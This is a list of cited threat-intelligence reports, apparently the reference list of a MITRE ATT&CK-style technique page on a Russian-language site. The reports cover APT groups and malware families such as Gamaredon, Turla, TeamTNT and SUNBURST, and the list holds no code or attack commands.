- Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.
- Unit 42. (2022, December 20). Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. Retrieved September 12, 2024.
- Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
- Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
- CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.
- Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
- Asheer Malhotra & Vitor Ventura. (2022, August 2). Manjusaka: A Chinese sibling of Sliver and Cobalt Strike. Retrieved September 4, 2024.
- Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.
- Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
- GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
- MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.
- Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.
- Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.
- Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
- Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.
- Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.
- Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.
- Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
- Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.
- Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.
- Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.
- Dedola, G. (2022, June 21). APT ToddyCat. Retrieved January 3, 2024.
- ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
- Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.
- Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
- Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.
- FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
- Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
- Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
- Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
- MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
- Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024.
- McLellan, T. et al. (2024, January 12). Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation. Retrieved February 27, 2024.
- Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.
- Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.
- Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
- ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
- Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.
- Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.
- NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.
- Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.
- Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.
- Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
- Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
- Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
- Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
- Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
- Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.
- Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
- FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
- Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved September 19, 2024.
- Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
- CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
- PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.
- PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
- Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
- Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.
- Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
- Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
- Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
- F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
- Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
- Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
- Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
- fatedier. (n.d.). What is frp?. Retrieved July 10, 2024.
- Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.
- Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.
- Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.
Связанные риски
Каталоги
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.